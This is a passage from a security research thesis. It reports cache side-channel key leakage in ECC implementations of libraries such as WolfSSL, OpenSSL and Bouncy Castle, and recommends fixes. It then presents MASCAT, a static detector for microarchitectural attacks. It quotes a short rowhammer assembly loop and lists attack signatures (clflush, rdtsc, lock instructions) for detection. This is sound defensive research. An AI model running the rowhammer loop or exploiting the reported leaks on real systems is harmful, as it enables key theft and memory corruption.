a similar approach to OpenSSL, but the scatter-gather precomputed table is not
always starting in a cache line boundary, i.e., there is no alignment check when the
table was initialized. In consequence, the OS chooses where the table starts with
respect to a cache line, i.e., it is not deterministic. Figure 7.14(b), in which the
table starts at a 1/4 of a cache line, helps to illustrate the problem. An attacker
monitoring set 0 obtains cache misses whenever c0,c1andc2are utilized, but cache
hits whenever c3is used. Thus, she can detect when window 3 has been utilized
by the exponentiation algorithm. If the table is created at the middle of a cache
line, she can recover when window 2 is being used (since she already knows when
3 is used). Thus, a divide and conquer approach leads to a full key recovery. In
contrast, OpenSSL performs an alignment check in the precomputed table.
7.3.7 Results for ECC
The last cryptographic primitive that we analyze is ECC. we perform 100 ECDH
private key operations for which we measure leakage. The following are the four
main implementation styles that we encountered for ECC implementation
7.3.7.1 Montgomery Ladder ECC (WolfSSL & Libgcrypt)
Only WolfSSL and Libgcrypt implemented this approach. Results are presented in
Figure 7.15(b). In the case of WolfSSL, we only found data leakage coming from the
key dependent register accesses. Unlike the behavior observed in RSA (in which the
cache lines could make the implementation not to leak), the ECC implementation
presents leakage for every key. Thus, an attacker can recover the key with just a few
traces if he primes the set that these key dependent register occupy in the cache. The
results for Libgcrypt indicate no presence of leakage because it utilizes a temporary
variable on which the computations are performed, and then the contents of it are
140
 0 0.2 0.4 0.6 0.8 1 1.2 1.4
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key number  WolfSSL ECC ML Data
WolfSSL ECC ML instructions
Noise threshold(a)
 0 0.2 0.4 0.6 0.8 1 1.2 1.4
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberData Libgcrypt ECC ML
Instruction Libgcrypt ECC ML
Noise threshold (b)
Figure 7.15: Montgomery Ladder ECC leakage for a) WolfSSL and b) Libgcrypt.
Magenta indicates instruction leakage while blue indicates instruction+data leakage.
Instructions do not give us any information in neither case. Register accesses give
us the full key in WolfSSL
placed in the corresponding registers in constant execution flow. This fully prevents
any leakage coming from the state registers, as both registers are read when one
needs to be used.
7.3.7.2 Sliding Window ECC (WolfSSL)
The default implementation in WolfSSL uses a sliding window approach, very similar
to the RSA implementation. The results are shown in Figure 7.16, displaying in
magenta the instruction leakage and the instruction plus data leakage in blue. We
observed that the implementation leaks from both the add instruction, which reveals
the zeroes between windows (for being distinct to the double function), and from
the accesses to the precomputed table, which reveal the window values. Once again,
the ECC implementation of WolfSSL leaks enough information to reveal the secret
key.
7.3.7.3 Fixed Window ECC (MbedTLS, Bouncy Castle, NSS)
As with RSA, fixed window implementations process the key in fixed wsized win-
dows. We present two examples, MbedTLS and Bouncy Castle, for which the results
are shown in Figures 7.17(a) and 7.17(b). Surprisingly, we do not observe any in-
struction or data leakage in the case of MbedTLS, while we did observe for RSA.
One of the differences with respect to the RSA implementation is that MbedTLS
accesses all the precomputed table values in a loop before using one, and they choose
it in constant execution flow. Thus, all table values are loaded into the cache while
only one needs to be used. The fact that their ECC algorithm is well designed
but their RSA algorithm is not is surprising. In the case of Bouncy Castle, we do
not observe leakage from key dependent instructions, but we observe leakage in the
141
 0 0.2 0.4 0.6 0.8 1 1.2 1.4 1.6 1.8
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberWolfSSL ECC instructions+table
WolfSSL ECC instructions
Noise thresholdFigure 7.16: Sliding window ECC leakage in WolfSSL. Magenta indicates instruction
leakage, blue indicates instruction+data leakage. Both sources leak information.
 0 0.1 0.2 0.3 0.4 0.5
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberMbedTLS ECC data
MbedTLS ECC instructions
Noise threshold
(a)
 0 0.1 0.2 0.3 0.4 0.5
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberBouncy Castle ECC table
Bouncy Castle ECC instructions
Noise threshold (b)
Figure 7.17: ECC leakage in MbedTLS and Bouncy Castle. Magenta represents
instruction leakage and blue represents instruction+data leakage. MbedTLS does
not leak while Bouncy Castle leaks information from the precomputed table
accesses to the key dependent precomputed table that allows an attacker to recover
the key.
7.3.7.4 wNAF ECC (OpenSSL & LibreSSL)
OpenSSL and LibreSSL utilize the wNAF scalar multiplication method. To reduce
the number of non-zero digits, wNAF works with signed digits, ensuring there are
at leastw+ 1 zeroes between two non-zero digits. Then the key is processed in a
loop, doubling always and performing additions/subtractions whenever a non-zero
digit is found. Note that, as the number of multiplications needed is reduced, the
algorithm show better performance behavior compared to those analyzed in previous
sections. The results for OpenSSL’s implementation are shown in Figure 7.18, where
the key dependent addition function instruction leakage is shown in blue, addition
instruction + key dependent precomputed table entry leakage is shown in green
142
and the additional key dependent sign change instruction leakage effect is shown in
magenta. As we can see, the addition instruction already gives us the zero values
(again, as we can distinguish it from the double function), the leakage from the
precomputed table accesses give us the window value and the sign change function
gives us the sign of the window value. Thus, OpenSSL a big door for ECC key
recovery attacks.
 0 0.2 0.4 0.6 0.8 1 1.2 1.4 1.6 1.8
 0 10  20  30  40  50  60  70  80  90 100Mutual Information (bits)
Decryption key numberOpenSSL ECC wNAF add instruction
OpenSSL ECC wNAF inst + table entry
OpenSSL ECC wNAF inst + table + sign
Noise threshold
Figure 7.18: wNAF ECC OpenSSL results. Blue shows addition instruction leakage,
magenta adds precomputed table entry leakage and green adds sign change leakage.
All possible sources leak information
7.3.8 Leakage Summary
This section summarizes the leakages found in the cryptographic libraries analyzed.
The results for all the default (marked in bold) and some non-default implementa-
tions are presented in Table 7.2. The third column indicates whether the implemen-
tation leaks the secret or not. We found that 50% of the default implementations
were susceptible to key recovery attacks (i.e. 12 out of 24). We believe these num-
bers are alarming especially given the popularity cache attacks have gained over
the last few years. These numbers underline the need for a methodology, like the
one proposed in this work, that cryptographic code designers can utilize to detect
leakages before the libraries are released to the public.
7.3.9 Comparison with Related Work
Our work is not the first attempt to detect cache leakage in software binaries. For
instance, Zankl et al. [ZHS16] use the PIN instrumentation tool to detect instruction
1Due to Intellectual Property conflicts, we are not allowed to disclose the approach taken by
the library
2We verified with OpenSSL that while the 1.0.1 branch leaks, the 1.1.0 branch does not leak
143
Table 7.2: Leakage summary for the cryptographic libraries. Default implementa-
tions are presented in bold
Cryptographic Primitive Library Outcome
AESOpenSSL (T-table) Leaks
OpenSSL (S-box) No leak
WolfSSL Leaks
IPP (v1)1No leak
IPP (v2)1No leak
LibreSSL (S-box) No leak
NSS Leaks
Libgcrypt No leak
Bouncy Castle Leaks
MbedTLS Leaks
RSAOpenSSL (Sliding W) Leaks
OpenSSL (Fixed W) No leak
WolfSSL (Montgomery L) Leaks
WolfSSL (Sliding W) Leaks
IPP Leaks
LibreSSL No leak
NSS No leak
Libgcrypt No leak
Bouncy Castle (Sliding W) Leaks
MbedTLS (Sliding W) Leaks
ECCOpenSSL (WNAF)2Leaks
WolfSSL (Montgomery L) Leaks
WolfSSL (Sliding W) Leaks
IPP1No leak
LibreSSL Leaks
NSS No leak
Libgcrypt No leak
Bouncy Castle (Fixed W) Leaks
MbedTLS (Fixed W) No leak
leakage in RSA implementations. Demme et al. [DMWS12] use simulated cache
traces to define a correlation-based side channel vulnerability factor of different
hardware characteristics. Almeida et al. [ABB+16] defined a generic constant time
security definition and verifies constant time implementations. Our work differs
from them in the following:
•We proposed a sophisticated tool that combines taint analysis with automatic
code insertion to track cache leakages of analyzed code while being executed
in a realistic environment. We make use of several modern techniques such as
theflush and reload technique, taint analysis and mutual information to
make the tool efficient and easy to use.
144
•The SVF proposed in [DMWS12] uses correlation between an ideal memory-
access trace and an cache-observable trace, every time for the entire analyzed
code. This means that constant execution flow code will still feature high
correlation on leaky architectures, even though the code is not vulnerable.
Hence, SVF is a metric for comparing hardware architectures, but cannot be
used to find leaking code.
•Like [ZHS16], our tool looks for dependencies between secret variables and
observed leakages to find vulnerabilities. We chose mutual information over
correlation, as mutual information is more generic as it does not only look for
linear relations and is as easy to implement. Furthermore our work evaluates
both instruction and data leakage, while [ZHS16] only analyzes instruction
leakage, mainly due to the limitation of the proposed PIN based approach to
find dynamic memory leakage. Extending their approach to cover leakage of
dynamically allocated data is difficult with using PIN, since memory references
vary for each execution.
•Unlike [ZHS16, ABB+16] our methodology takes into account microarchitec-
tural features such as cache line sizes that can affect the code’s resistance
to cache attacks. This is particularly important to expose leakages caused
by OS data cache line missalignments, as those described in Section 7.3.6.3
and 7.3.6.1, which are not observable without empirical cache traces.
•Compared to [ZHS16, ABB+16], our methodology detects exploitable leakage,
as demonstrated by our discovered 12 vulnerabilities that are being fixed. In
contrast, [ABB+16] does not expose new vulnerabilities (it would simply mark
all analyzed libraries as non-constant execution flow, i.e., generates lots of false
positives) while [ZHS16] only exposed one.
7.3.10 Recommendations to Avoid Leakages in Cryptographic
Software
Our work demonstrates that up to date cryptographic libraries are still vulnerable
to cache side channel attacks. The leakages were primarily due to key dependent
memory accesses which are divided into two classes:
1. Secret dependent non-constant execution flow.
2. Secret dependent data memory accesses.
The leakages found in this work can be avoided by designing cryptographic code with
those two considerations in mind. Based on the observations made in this study,
we provide the following recommendations More specifically, we provide the follow-
ing recommendations and observations made in this study for the cryptographic
primitives analyzed:
145
•S-Box and T-table based AES : Cryptographic code designers should at
least protect against passive attackers by prefetching the T-table or the S-box
into the cache before the encryption. To be protected against an attacker
with higher resolution, the whole table has to be fetched for each table ac-
cess. Alternatively designers can use vector permutation instruction based
implementations [Ham09].
•S-Box free AES implementation : These implementations are protected
since no key dependent look-up tables are used. AES-NI and implementations
where the Affine Transformation is computed on the fly are examples of safe
implementations.
•Square and Multiply RSA : Designers should avoid this implementation,
since cache protection introduces large overheads.
•Montgomery Ladder RSA : Designers should use temporary registers and
constant execution flow.
•Sliding/Fixed window RSA : Both sliding and fixed window approaches
should protect accesses to the precomputed table, e.g., accessing all table
entries in a loop. Additionally, if sliding window is used, designers should use
the same instruction to perform squaring and multiplying operations.
•Double and Add ECC :Do not use this implementation . Protecting instruc-
tions in ECC is difficult, since double and add perform different operations.
•Montgomery Ladder ECC : Designers should use temporary registers with
constant execution flow.
•Sliding/Fixed Window ECC : In both cases, the table has to be protected
e.g. by accessing all entries in a loop. However, we recommend using fixed win-
dow over sliding window for ECC , since protecting double and add instruction
is difficult and can reveal partial key values.
•WNAF : Although the fastest implementation, we found that its leakage its
quite high. Indeed, prior attacks have shown to recover the key even just from
the instruction leakage (e.g., [BvdPSY14]).
If implementers choose to go all the way and write code with a truly secret-
independent execution flow, a tool like [ABB+16] can be very helpful. However, if
designers depend on microarchitectural properties to hide secret-dependent indexing
(see Section 7.3.6.3), we strongly recommend the methodology proposed in this work
to verify that all assumptions are actually met.
146
7.3.11 Outcomes
We introduced a proactive tool to detect leakage in security critical code before
deployment. The tool uses cache traces for secret dependent memory obtained from
execution of the code on the actual microarchitecture and uses the generic Mutual
Information Analysis (MIA) as a metric to determine cache leakage. The detection
technique can be run across all target platforms without having to redesign it, yet
pinpoints parts of code that cause found leakages. We used the detection technique
to perform the first big scale analysis of popular cryptographic libraries on the
three most popular crypto-primitives, namely AES, RSA and ECC. Our results
show that about half of the implementations leak information through the LLC.
Worse still, a tool like ours can also be used by malicious parties to find exploitable
vulnerabilities with ease. This proves the need for cryptographic libraries to resist
cache attacks, which can be aided by using the proposed tool in real-life security
software development.
7.4MASCAT : Preventing Microarchitectural At-
tacks from Being Executed
In the previous section, we presented a tool to help code designers avoid cache
leakages from being exploited. However, we understand that the acquisition and
execution of tools like the one we proposed might not be immediate, and that even
if they do, cache attacks can still try to recover non-security critical data from benign
applications, e.g. the number of items in a shopping cart [ZJRR14] or key strokes
on a touch screen [GSM15]. Further, malicious attackers can try to utilize different
covert channels than the proposed LLC. For instance, memory bus locking attacks
are capable of acting as covert-channels and may be used for detecting hardware co-
residency or for Quality of Service (QoS) degradation [VZRS15, IIES16]. In addition,
rowhammer attacks pushed the envelope further by introducing cryptographic faults
or by breaking memory isolation techniques [BM16, XZZT16].
Besides, one of the reasons why microarchitectural attacks are so dangerous is the
wide range of situations they apply. We have proved in previous sections how they
can be applied in commercial clouds (e.g. Amazon EC2), but they can also be ap-
plied in very common scenarios as in browsers (as Javascript extensions [OKSK15])
or even on mobile devices, e.g. as smartphone applications [LGS+16].
Due to the severity of the threat, it is important not only to design leakage-free
code but also to roll out protection against microarchitectural attacks before they
find widespread adoption. Solutions proposed so far, can be divided into preven-
tive and reactive (online detection) categories. The implementation of preventive
methodologies, e.g., page coloring or Intel Cache Allocation Technology [LGY+16],
requires changes to current infrastructure (hardware or OS/hypervisor), and usually
incurs noticeable performance overheads, making infrastructure providers unlikely
147
to deploy them (in fact we have not seen any of those applied in commercial use).
Similarly, reactive approaches, such as monitoring of performance counter events by
the OS [ZZL16] also incur overheads and thus make widespread adoption unlikely.
In some of the aforementioned cache applicable scenarios, e.g. smartphones or
even play Operating Systems (like Windows) software is now commonly distributed
through official digital app stores, e.g., Microsoft store or Android Google Play.
Users can profit from a certain level of trust for the downloaded applications, as
store operators review app binaries before posting them. However, unlike other
kind of malware, microarchitectural attacks look harmless, as they access resources
in a natural way like other harmless code and are thus harder to detect. A common
solution is to utilize anti-virus software to detect malicious code inside binaries.
Nevertheless, as it will be presented later in this document, these mis-detect the
majority of microarchitectural attacks. In consequence, microarchitectural attacks
can take advantage of the lack of proper detection mechanisms in official app stores
and utilize them as a channel to obtain widespread distribution.
We present MASCAT (microarchitectural side channel attack trapper), a tool
to detect microarchitectural attacks through static analysis of binaries. In short
MASCAT is similar to an antivirus tool to catch microarchitectural attacks embedded
in innocent looking software. MASCAT works by statically analyzing binary elf
files, detecting implicit characteristics commonly exhibited by microarchitectural
attacks. We have identified several characteristics that give strong evidence of the
presence of certain attack classes. The importance factor of each characteristic is
configurable to either detect all or a specific subset of microarchitectural attacks.
Further, our approach is designed to easily add more characteristics to the range
of attacks that MASCAT covers. The execution of our approach is fully automated
and in comparison to other solutions, the outcome is easily understandable as it not
only colors the location where the threat was found in the binary but also adds an
explanation on the characteristics that triggered the alarm.
Due to its similarity to antivirus tools, MASCAT can be adopted by digital
application distributors (like Androids GooglePlay, Microsoft Store or Apple app
store) to ensure the applications being offered do not contain microarchitectural
attacks. In fact, they can use MASCAT to detect the presence of microarchitectural
attack characteristics, and decide whether the application needs to be removed.
More than that, if such an attack is found, the submitter can be banned from the
app store. Further, MASCAT can be easily adopted by antivirus software users who
would otherwise find it technically challenging to adopt any of the other existing
countermeasures.
In summary, this section
•Shows for the first time that app stores can stop microarchitectural attacks
prior to their execution without the collaboration of OS/software designers;
•Introduces a novel static binary analysis approach looking for attributes im-
plicit to microarchitectural attacks in apparently innocent binaries and APKs;
148
•Performs a full analysis of 32 attack codes designed by different research groups
and identifies characteristics that are common to the various classes of attacks.
•Implements a configurable threat score based approach, that is not only easily
changeable but also expandable. This approach yields a detection rate of
96.67%.
•Presents a false positive analysis on x86-64 binaries and Android APKs to
estimate an average of 0.75% false positive rates.
7.4.1 Microarchitectural Attacks
Microarchitectural attacks take advantage of shared hardware contention to infer
information from a co-resident victim. The choice of the hardware piece to target
usually becomes a trade-off between feasibility and threat exposure. In the last years
several practical microarchitectural attacks with severe privacy/availability violation
implications have been proposed, most of which we include in our static analysis
approach. Although our thesis has mainly described cache attacks, MASCAT will
consider an broader range of attacks. This section gives a brief description on the
functionality of each of them.
7.4.1.1 Cache Attacks
Cache attacks take advantage of cache collisions occurring in some shared cache in
the cache hierarchy. These collisions are detected by measuring access times, i.e., by
distinguishing accesses between two levels in the same cache hierarchy or between
accesses to the cache hierarchy and accesses to the DRAM. Although several attack
designs have been proposed, two (and their derivations) stand out over the rest and
have already been discussed in our work: the Flush and Reload and the Prime and
Probe attacks. Once again, as the Invalidate and Transfer is consider a derivation
ofFlush and Reload for its similar characteristics:
Flush and Reload :The Flush and Reload attack assumes memory sharing be-
tween victim and attacker and is performed in three major steps. In the first step,
the attacker removes a shared memory block from the cache hierarchy (e.g., with the
clflush instruction). In the second step, the attacker lets the victim interact with
the shared memory block by waiting a specified number of cycles. In the last step,
the attacker re-accesses the removed memory block. If the memory block comes
from the cache (i.e. a fast access time observed) she derives that the victim utilized
the memory block during the waiting period. On the contrary, if the memory block
comes from the DRAM (i.e. a slow access observed) the attacker assumes the vic-
tim did not access the memory block during the waiting period. Flush and Reload
attacks have been exploited in Section 4 and in [YF14, GSM15].
149
Figure 7.19: Flush and Reload code snippet from [YF14]
Prime and Probe :The Prime and Probe attack does not make any special as-
sumption between victim and attacker (rather than sharing the underlying hard-
ware) and is also performed in three major steps. In the first step, the attacker fills
a portion of the cache (usually a set) with his own data. Then the attacker waits
again hoping to observe activity from the victim. In the third step, he re-accesses
the data he used to fill part of the cache. If all his data comes from the cache (i.e.
low access times) the attacker assumes the victim did not use the portion of the
cache she filled (otherwise one of her data lines would have been evicted). On the
contrary, if she observes that at least one of her data lines (i.e. high access times)
comes from the DRAM, the she assumes the victims utilized that portion of the
cache. Prime and Probe attacks were exploited in Sections 6 and in [Fan15].
Combinations of both techniques have also shown to be successful at executing
attacks. For instance, a Evict and Reload approach would be successful in those
systems in which users do not have access to a clflush like instruction.
7.4.1.2 DRAM Access Attacks
The DRAM is usually divided in channels (physical links between DRAM and mem-
ory controller), Dual Inline Memory Modules (DIMMS, physical memory modules
attached to each channel), ranks (bank and front of DIMMS), banks ( analogous
to cache sets) and rows (analogous to cache lines). If two addresses are physically
adjacent they share the same channel, DIMM, rank and bank. Additionally each
bank contains a row buffer array that holds the most recently accessed row.
In fact DRAM access side channel attacks take advantage of collisions produced
between addresses physically adjacent, i.e., in the same bank, rank, DIMM and
channel. More precisely, retrieving a memory location from the row buffer yields
150
loop :
mov (X) , % eax
mov (Y) , % ebx
c l f l u s h (X)
c l f l u s h (Y)
mfence
jmp loop
Figure 7.20: Rowhammer code snippet from [KDK+14a]
faster accesses than retrieving it from the bank. In fact, the row buffer acts like
a direct mapped cache holding the most recently accessed rows. In order to build
a successful attack, an attacker would first have to prime the row buffer. Then
he would have to evict the cache portion that the target memory location occupies,
making sure that the next victim access will hit the DRAM. After the victim access,
the attacker probes the row buffer to check whether the victim accessed memory
locations within the same bank. If he did, he will observe row buffer misses, and
thus an increase in the access time. On the contrary, if the victim did not access
bank congruent locations, the attacker will obtain fast accesses for his primed data.
The attack was proposed and exploited in [PGM+16].
7.4.1.3 Rowhammer Attacks
Rowhammer attacks take advantage of disturbance errors that occur in adjacent
DRAM rows within the same DRAM bank. It has been demonstrated that con-
tinuous accesses to a DRAM row can indeed influence the charge of adjacent row
cells, making them leak at a higher rate. If these cells loose charge faster than
the charge refreshing interval, accesses to a DRAM row induce bit flips in adjacent
rows in the same bank. Note that bit flips can have catastrophic consequences, e.g.,
cryptographic fault injections.
In order to execute a rowhammer attack, an attacker performs three essential
steps. The attacker first opens a row that resides in the same bank as the row
in which bit flips want to be induced. Then the attacker performs accesses to the
DRAM row, trying to influence the charge leak rate of adjacent rows. In the third
step, the attacker removes the accessed DRAM row from the cache hierarchy to
ensure the next subsequent accesses will access the DRAM (e.g. with the clflush
instruction). Note that steps 2 and three are continuously executed in a loop to try
to induce bit flips in the victims DRAM row. Examples of studies in rowhammer
attacks are [KDK+14a, GMM16, BM16].
151
7.4.1.4 Memory Bus Locking Covert Channels
Memory Bus Locking attacks take advantage of pipeline flushes that occur when
atomic operations are performed on data that occupies more than one cache line.
However, if the atomic operation is performed on data that fits within a single
cache line the system locks the cache line for the atomic operation to happen. The
pipeline flushing operations cause pipeline flushes that incur in performance over-
heads. Memory bus locking mechanisms have been used as a method to establish
covert channels and derive co-residency in IaaS clouds and as a mechanism to per-
form Quality of Service degradation (QoS) [VZRS15, IIES16].
7.4.2 Implicit Characteristics of Microarchitectural Attacks
In this section we review those characteristics that well known microarchitectural
attacks exhibit in their design. More in particular, we put our focus in three of
the most dangerous microarchitectural threats presented in the last years: Cache/-
DRAM attacks, memory bus locking and rowhammer attacks.
7.4.2.1 Cache Attacks
As already explained in the background section, cache attacks are implemented by
creating cache contentions in any of the caches in the cache hierarchy. This effect,
depending on the attack structure, can be accomplished in several ways. However,
the majority of cache attacks have three main characteristics in common:
•High resolution timers Cache attacks rely on the ability of distinguishing
different access patterns (e.g. L1 accesses from LLC accesses or even memory
accesses). As these accesses differ at most by a few hundred cycles, the at-
tacker needs to have access to a timer accurate enough to carry out an attack.
These timers can be accessed in many different ways (e.g., the common rdtsc
function or an incremental thread).
•Memory Barriers Another common factor of cache attacks is the utilization
of memory barriers to ensure serialization before the targeted reads are exe-
cuted (i.e. making sure any load and stores have finished before the target
access). These memory barriers can sometimes be embedded in timer instruc-
tions (like the popular rdtscp instruction) or can come in the form of different
instructions.
•Cache evictions The last factor that all cache attacks have in common is
the implementation of an eviction routine that removes a target cache line
from the cache hierarchy. This can be implemented with the popular flush
instruction (in the case of shared memory) or with the creation of eviction
sets.
152
7.4.2.2 DRAM Access Attacks
Similar to cache attacks, DRAM access attacks base their functionality on the ca-
pacity of colliding with an attacker in the same row buffer of the same bank, rank,
Dual Inline Memory Module (DIMM) and channel. In order to achieve that purpose,
DRAM attacks share common characteristics with cache attacks.
•Cache evictions DRAM access attacks exploit collisions in the DRAM row
buffer, and as such, attackers need the victim to access the DRAM (instead of
caches) for memory fetches. Since every time the victim makes an access the
memory location would be brought to the cache, the attacker continuously
needs to evict memory locations from the cache hierarchy. As with cache
attacks, this can be achieved by utilizing specific instructions (i.e. the flush
instruction) or with carefully designed eviction set mechanisms.
•Fine grain timers In order to retrieve meaningful information, attackers
need to distinguish between DRAM row buffer hits and misses. This implicitly
requires accesses to fine grain timers.
•Memory barriers To prevent out of order execution and obtain precise tim-
ing behavior.
7.4.2.3 Rowhammer Attacks
Rowhammer attacks are perhaps the microarchitectural attack with the most dan-
gerous implications that has been discovered in the last decade, due to the ability of
flipping bits from memory locations belonging to a victim. In contrast to cache or
memory bus locking attacks, rowhammer attacks only have one clearly distinguish-
able characteristic:
•Cache bypassing In fact, rowhammer attacks rely on continuous access to
a DRAM location that shares the DRAM bank with the victims memory
location. Thus, attacker need to continuously bypass the cache, otherwise the
CPU will bring the accessed DRAM portion to the cache for faster access.
There are several methodologies to avoid the cache accesses, some of which
are similar to those utilized in cache attacks (e.g. flush instructions or eviction
sets).
7.4.2.4 Memory Bus Locking Covert Channels
Another popular microarchitectural attack is the ability to stall the memory bus to
establish a covert channel between two co-resident processes. As with cache attacks,
memory bus locking covert channels also have their own characteristics that need
to be accomplished in their design:
153
•High resolution timers As with cache attacks, memory bus locking mech-
anisms require a fine grain timer to measures the transmission of a 1 or 0
bit depending on the time to execute atomic operations. Further, fine grain
timers might also be utilized by attackers willing to ensure the effects of the
memory bus lockdown prior to its execution.
•Lock Instructions In addition to the fine grain timer, these attacks also re-
quire of specific atomic instructions capable of locking the memory bus. In
x86-64 systems these instructions include, among others, the ADC, ADD,
AND, BTC, BTR, BTS, CMPXCHG, DEC, FADDL, INC, NEG, NOT, OR,
SBB, SUB, XADD, XOR instructions with the lock prefix. Further, the XCHG
instruction executes atomically when operating on a memory location, regard-
less of the LOCK use.
7.4.3 Our Approach: MASCAT a Static Analysis Tool for
Microarchitectural Attacks
After identifying the main characteristics of the attacks we aim to detect, we pro-
pose a novel technique to detect microarchitectural attacks by statically analyzing
binaries. All countermeasures proposed to detect microarchitectural attacks so far
are based on dynamically detecting specific microarchitectural patterns when the
binary is executed. We observe three clear problems with this approach:
•The knowledge on how to install and use such a dynamic analysis tool might
not be trivial for every end-user. Thus, although such an approach might well
be adoptable by large scale systems (like IaaS clouds), a regular user might
not have the technical capabilities to use it.
•The adoption of some of those mechanisms might not be in control of on-
line app distributors, who might be blamed if an application offered in their
repository succeeds attacking an end device.
•Cache attacks can be embedded into a binary to be executed only after some
specific time/date or event. Thus, the system should be monitoring the mi-
croarchitectural patterns of the binary every time it is executed and not only
once. Thus such tools can create significant overhead in the system.
Our approach solves these issues. Upon the reception of a potentially malicious
binary, the most common approach to validate its sanity before it is executed is to
utilize an antivirus software. Although antivirus tools might work well with certain
kind of malware [SKH11], their success when detecting microarchitectural attacks is
still an open question. Table 7.3 shows the outcome of such an analysis using well
known antivirus software (the best in 2016, as stated in [Lib]). Indeed, we utilized
all our examples of cache, DRAM, rowhammer and memory bus locking attacks.
154
Table 7.3: As of 12.28.2016, none of the major antivirus tools detects the majority
of the attacks we analyzed ( means non-detected and ✓means detected). The
only exception is Drammer, which is detected by 7 out of 9 antiviruses
Antivirus Output cache/ Output Output bus Output Drammer
software /DRAM attack rowhammer locking [vdVFL+16]
Avast    ✓
BitDefender    ✓
Emsisoft    
ESET-NOD32    ✓
KasperSky    ✓
F-secure    ✓
McAfee    ✓
Symantec    ✓
TrendMicro    
None of the antivirus softwares were able to detect that the binaries were malicious,
except for the drammer APK [vdVFL+16], which was detected by 7 of 9 antivirus
tools.
In order to cope with this problem, we propose MASCAT , a tool that detects
intrinsic characteristics of microarchitectural attack code in potentially malicious
binaries. MASCAT consists of several fully automated scripts that are executed by
the well known IDA Pro static binary disassembler. Thus, MASCAT can be directly
adopted by any person using IDA Pro or can be directly translated to any other
static binary disassembler. Furthermore, it can be offered as an online scanner for
microarchitectural attack code. The following section details on the methodology
that our static analysis approach uses to detect malicious microarchitectural attacks.
7.4.3.1 Attributes Analyzed by MASCAT
This section summarizes the attributes that MASCAT detects within the binary code.
Note that the goal of our design is not to detect all possible microarchitectural attack
designs but rather to give a good framework on the detection of existing attacks.
More attributes can be added to cover more sophisticated and intelligent designs of
microarchitectural attacks. All the attributes below are critical only when used in
a loop, with the exception of the affinity assignment. Thus, we mark them only if
we observe them inside loops.
•Cache flushing instructions: Cache flushing instructions are included in the
ISA to perform cache coherency operations often needed in parallel processing.
These instructions are commonly used for both cache attacks as well as DRAM
access and rowhammer attacks, as they allow the user to evict a memory block
from the cache. Intel utilizes the clflush instruction for this purpose, while
ARM utilizes the DC CIVAC instructions (only available from ARMv8 on).
155
Since these attacks require several accesses to succeed, our tool identifies both
instructions when being used inside a loop.
•Non-temporal instructions: Non-temporal instructions permit the access
to a memory location bypassing the cache hierarchy, i.e., making a direct
DRAM access. Obviously, these instructions can be utilized as part of a
rowhammer attack, which requires several accesses to the same DRAM bank.
Examples of these instructions are the monvnti andmovntdq for Intel or STNP
for ARM. Again, the tool marks these instructions if they are utilized in a
loop.
•Monotonic timers, thread counters, performance counters, special-
ized fine-grain timer instructions: Fine grain timers are utilized by cache
and DRAM attacks and by bus locking covert channels. Such timers can be
built utilizing specialized instructions like the rdtscp andrdtsc instructions
on Intel or the c9 register on ARM. In contrast to rdtsc ,rdtscp further im-
plements memory barrier instructions before reading the clock cycle counter.
Similarly, performance counters can be queried to get the number of elapsed
clock cycles or the number of evictions. If none of these natural counters are
accessible, a timer can be created by using a thread continuously incrementing
a counter. Lastly, and by far the noisiest method, one can utilize access to
monotonic timers offered by the OS. Our tool identifies any of these timers if
they are repeatedly accessed in loops.
•Memory barrier instructions: These instructions are necessary to prevent
out of order execution and to obtain accurate timings from the fine grain
timers. Instructions that execute memory barrier operations in x86-64 are
lfence (to ensure all loads have finished) and mfence and cpuid loads (to
ensure all loads and stores have finished). In ARM, this can be achieved by
theDSB,ISBandDMBinstructions.
•Lock instructions: Atomic instructions that can be issued to implement
memory bus locking attacks. Our tool monitors for all the instruction with
the lock prefix plus the XCHG instruction in x86-64 binaries, as well as for
LDREX andSTREX instructions in ARM binaries.
•Jump opcodes: L1 instruction cache attacks are commonly designed utilizing
jump opcodes to jump to set concurrent addresses. Our tool again analyzes
whether any of the functions inside a binary assigns jump opcodes in a loop.
•Pointer chasing & Page size jump approaches: One of the approaches
that can be taken to create cache eviction sets (which can be utilized for cache,
DRAM access and rowhammer attacks) is the pointer chasing approach, in
which the address of the next address is stored in contents of the previous
address. Another approach is to introduce jumps of lbytes within a vector,
156
Take Next 
AttributeMark attribute
locations
Related 
attributes 
exist?Get current 
threat scoreUpdate threat 
score in 
locations
StartEnd
NoNoNoOther
attributes
exist?No
Yes YesYesYes
Attribute
found?Last
attribute?Figure 7.21: Attribute analysis and threat score update implemented by MASCAT .
wherelis the necessary number of bytes to find set-concurrent addresses. Our
tool identifies both approaches when utilized in binary code.
•Selfmap translation & slice mappings Although non-available from user
mode since linux kernel 4.0.0, prior kernels are still vulnerable to having an
attacker looking at the physical address of his memory to facilitate eviction set
creations. Aiming at avoiding these attacks, our tool also identifies accesses to
this particular mapping. Further, in the case of x86-64 binaries, our tool also
finds whether the known slice selection algorithms are utilized in the binary
code to guess the slice location of the memory addresses.
•Affinity assignment Some of the above mentioned attacks (like the L1 cache
attacks or LLC attacks) only succeed when core co-residency or CPU clus-
ter co-residency are achieved. Further, the timers (and especially the thread
counter) exhibit better performance when scheduled on a single core. Thus,
our tool also tries to identify whether there is any affinity assignment inside
the inspected binary code.
7.4.3.2 Measuring the Threat Score
One of the most important challenges of the design of our tool is to determine,
based on the attributes observed, whether a threat exists or not. Although we could
use machine learning algorithms to design such a methodology, we believe there
are several facts that have to be smartly taken into account (e.g. location of the
attributes, location of the nested functions calling the functions where the attributes
were found, etc.) that can make machine learning algorithms to perform poorly. In
contrast, we design MASCAT to be intelligent enough to retrieve those facts, such
that we do not have a necessity for utilizing an automated data analysis tool. In
particular we design our tool to retrieve:
•Location of an attribute and functions interacting with it: Particularly
useful is the knowledge of the location in which these attributes are observed.
157
MASCAT is designed to retrieve all locations from which the code can reach
the location where an attribute is observed, i.e., all possible functions that can
reach the location in which the attribute was found.
•Interaction between attributes: As stated before, a key factor of microar-
chitectural attacks is not only the attributes they exhibit, but also the relation
between them. In that sense, MASCAT takes into account where and how at-
tributes interact with each other to decide whether a microarchitectural attack
exists.
In order to achieve the goals described above, we decide to implement a score sys-
tem based on the combination of attributes observed. The main idea is represented
in Figure 7.21. MASCAT analyzes, one by one, and ordered by threat magnitude
